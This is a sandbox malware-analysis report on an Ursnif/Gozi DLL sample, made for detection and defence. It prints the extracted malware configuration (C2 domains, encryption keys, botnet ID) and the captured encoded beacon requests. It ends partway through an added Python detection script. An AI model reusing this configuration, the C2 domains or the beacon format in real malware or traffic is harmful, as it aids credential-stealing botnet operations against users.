
Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Sample Name: 6yDD19jMIu.dll
Analysis ID: 500309
MD5: 903cf677ba834a968b42bd71e4626a9d
SHA1: c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256: b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
Tags: BRT, dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4668 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 1656 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4712 cmdline: rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 892 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1820 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4040 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=",
  "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"],
  "botnet": "8899",
  "server": "12",
  "serpent_key": "56473871MNTYAIDA",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Source                                                               Rule                  Description           Author
00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
(30 further matching memory dumps are not reproduced here)

            Unpacked PEs

Source                                  Rule                  Description           Author
3.3.rundll32.exe.70a31a.0.unpack        JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.3.loaddll32.exe.caa31a.0.raw.unpack   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
3.2.rundll32.exe.810000.0.unpack        JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.2.loaddll32.exe.30794a0.1.unpack      JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
3.3.rundll32.exe.70a31a.0.raw.unpack    JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
(16 further matching unpacked PEs are not reproduced here)

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp  Malware Configuration Extractor: Ursnif (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 6yDD19jMIu.dll  VirusTotal: Detection: 9%
Multi AV Scanner detection for domain / URL
Source: areuranel.website  VirusTotal: Detection: 6%
Source: breuranel.website  VirusTotal: Detection: 6%
Source: https://areuranel.website/  VirusTotal: Detection: 6%
Source: 6yDD19jMIu.dll  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 6yDD19jMIu.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: unknown  HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.7:49773 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.7:49776 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49810 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49812 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49842 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49843 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.97.137.114:443 -> 192.168.2.7:49844 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49846 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 52.98.214.82:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb  source: loaddll32.exe, 00000000.00000002.775494976.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776806344.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.471242410.000000006E53B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
Source: Binary strings: PDB names of Windows system modules, found only in the memory of the three WerFault.exe crash handlers (process indices 00000013, 00000014 and 00000017) and not in the sample. The report lists each name once per dump region, often with a stray trailing character (profapi.pdb&, dwmapi.pdb7, ucrtbase.pdbk), which is memory-dump residue rather than part of the name. De-duplicated: AcLayers.pdb, advapi32.pdb, apphelp.pdb, bcrypt.pdb, bcryptprimitives.pdb, cfgmgr32.pdb, combase.pdb, CoreMessaging.pdb, CoreUIComponents.pdb, cryptbase.pdb, dwmapi.pdb, fltLib.pdb, imagehlp.pdb, iphlpapi.pdb, Kernel.Appcore.pdb, mpr.pdb, msctf.pdb, msvcp_win.pdb, msvcrt.pdb, ntmarta.pdb, ole32.pdb, oleaut32.pdb, powrprof.pdb, profapi.pdb, propsys.pdb, rundll32.pdb, sechost.pdb, setupapi.pdb, sfc.pdb, sfc_os.pdb, shcore.pdb, shell32.pdb, shlwapi.pdb, TextInputFramework.pdb, ucrtbase.pdb, wgdi32.pdb, wgdi32full.pdb, wimm32.pdb, Windows.Storage.pdb, winspool.pdb, WinTypes.pdb, wkernel32.pdb, wkernelbase.pdb, wntdll.pdb, wrpcrt4.pdb, wsspicli.pdb, wuser32.pdb, wUxTheme.pdb, wwin32u.pdb

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 52.97.219.162 187
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 52.97.223.66 187
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 40.101.124.210 187
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe  Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 52.97.137.114 187
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 13.82.28.61 187
Every address in the Network Connect entries above is also recorded as the server of a TLS 1.2 session on port 443 in the HTTPS traffic list, inside Microsoft address space (ASN MICROSOFT-CORP-MSN-AS-BLOCKUS). The two .website names from the extracted configuration (areuranel.website, breuranel.website) appear in this run only as DNS queries; the captured HTTP requests go to the Microsoft hosts that the configuration lists next to them (msn.com/mail, outlook.com/signup).
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 65c8d4ee-587b-c9b1-e6a8-2fcf099847ce | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedBETarget: AM6PR04MB5622.EURPRD04.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: 7tTIZXtYscnmqC/PCZhHzg.1 | X-Powered-By: ASP.NET | X-FEServer: AS8PR04CA0145 | Date: Mon, 11 Oct 2021 20:36:54 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 4b4aee2f-6f98-79c7-950f-5c79da77b3fe | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedBETarget: AM6PR06MB4263.eurprd06.prod.outlook.com | X-BackEndHttpStatus: 404 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: L+5KS5hvx3mVD1x52nez/g.1 | X-Powered-By: ASP.NET | X-FEServer: AS9PR06CA0128 | Date: Mon, 11 Oct 2021 20:36:58 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 85b7812e-0a7c-b961-2cc4-adf543fab5ae | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: VI1PR08CU010.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: VI1PR08CA0134.EURPRD08.PROD.OUTLOOK.COM | X-CalculatedBETarget: VI1PR06MB5455.EURPRD06.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: LoG3hXwKYbksxK31Q/q1rg.1.1 | X-FEServer: VI1PR08CA0134 | X-Powered-By: ASP.NET | X-FEServer: AS9PR06CA0260 | Date: Mon, 11 Oct 2021 20:38:17 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 295ac203-bc6e-2f15-84bf-9c5b1de6eb11 | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: AM9P193CU001.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: AM9P193CA0023.EURP193.PROD.OUTLOOK.COM | X-CalculatedBETarget: AM0PR05MB4915.eurprd05.prod.outlook.com | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: A8JaKW68FS+Ev5xbHebrEQ.1.1 | X-FEServer: AM9P193CA0023 | X-Powered-By: ASP.NET | X-FEServer: AS9PR05CA0054 | Date: Mon, 11 Oct 2021 20:38:20 GMT | Connection: close
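                      Every request above has the same shape: a long chain of path segments of URL-safe text containing the _2B and _2F escapes, a short bogus extension (.jre here), a hard-coded "MSIE 8.0" User-Agent that claims Windows NT 10.0 (Internet Explorer 8 never ran on Windows 10), and a Host header naming a Microsoft domain that answers 404. The memory strings further down show the identical URI shape built for areuranel.website and breuranel.website, so a network detection should key on the URI shape, not on the Host header. The script below is an added example written for this report; it is not a Joe Sandbox signature or code from the sample. The thresholds (at least six segments, presence of _2B/_2F once slashes are stripped, a 2-4 character extension) and the hypothetical constant names are the editor's assumptions drawn from the requests listed here. The sample input is two request lines copied from above plus one constructed benign line as a control, and the parser accepts the headers either glued together as extracted or separated by " | ".

```python
"""Flag Gozi/ISFB (Ursnif) style beacon URLs in Joe Sandbox 'HTTP traffic detected' lines.

Added example for this report. The heuristic is an editor's assumption drawn from the
request lines in the Networking section, not a rule shipped by Joe Sandbox.
"""
import re

# Sample input: the first msn.com and the first outlook.com request lines copied from
# the report, plus one CONSTRUCTED benign line (last entry) used as a control.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com",
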